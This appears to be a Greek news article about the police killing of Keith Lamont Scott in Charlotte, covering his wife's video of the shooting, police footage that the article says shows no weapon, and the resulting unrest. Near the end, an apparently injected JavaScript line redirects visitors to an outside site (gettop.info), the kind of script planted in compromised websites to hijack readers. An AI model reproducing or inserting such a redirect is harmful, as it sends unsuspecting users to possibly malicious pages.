ΗΠΑ: Στη δημοσιότητα το βίντεο από τη δολοφονία Αφροαμερικανού στη Σάρλοτ

0
4

 

Η σύζυγος του θύματος Κιθ Λαμόντ Σκοτ που έπεσε νεκρός από αστυνομικά πυρά στη Σάρλοτ της Βόρειας Καρολίνα έδωσε στη δημοσιότητα το βίντεο από τη στιγμή της δολοφονίας του Αφροαμερικανού. Το νέο περιστατικό αστυνομικής βίας προκάλεσε επεισόδια, συγκρούσεις και διαδηλώσεις στους δρόμους της πόλης η οποία κηρύχθηκε σε κατάσταση εκτάκτου ανάγκης.

Η γυναίκα φωνάζει στην αστυνομία «μην πυροβολήσετε. Δεν έχει όπλο. Μην πυροβολήσετε. Δεν έκανε κάτι. Μόλις πήρε το φάρμακό του. Δεν θα σας κάνει κάτι…» προειδοποιεί την αστυνομία ενώ φωνάζει στον σύζυγό της «Μην τους αφήσεις να σπάσουν το τζάμι. Βγες από το αυτοκίνητο»… Ακολουθούν πυροβολισμοί «Τον πυροβολήσατε. Κάντε να μην είναι νεκρός… Μακάρι να είναι ζωντανός… Δεν έκανε κάτι. Καλύτερα να ζήσει γιατί δεν έκανε κάτι… Εγώ δεν σας πλησιάζω αλλά ακούτε! Καλύτερα να είναι ζωντανός… Σας το ορκίζομαι!» απευθύνεται στους αστυνομικούς.

Η αστυνομία έδωσε στη δημοσιότητα δύο δικά της βίντεο που ισχυρίζεται ότι απεικονίζουν ακριβώς τι συνέβη και πως ο άνδρας οπλοφορούσε και κρατούσε μαριχουάνα, ωστόσο κανένα από τα δύο βίντεο δεν δείχνει τον άνδρα να οπλοφορεί ή να κρατά οτιδήποτε. Το ένα προέρχεται από κάμερα σε περιπολικό και το άλλο από ενσωματωμένη κάμερα σε στολή αστυνομικού.

Δύο αστυνομικοί έχουν προτεταμένα τα όπλα τους προς το σημείο όπου βρίσκεται ο Κιθ Λαμόντ Σκοτ ο οποίος κάθεται μέσα στο αυτοκίνητό του, με τα παράθυρα κλειστά. Βγαίνοντας, φαίνεται να παραπατά, με τέσσερις πυροβολισμούς να ακούγονται. Την ίδια ώρα, ακούγονται και οι φωνές της γυναίκας του.

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here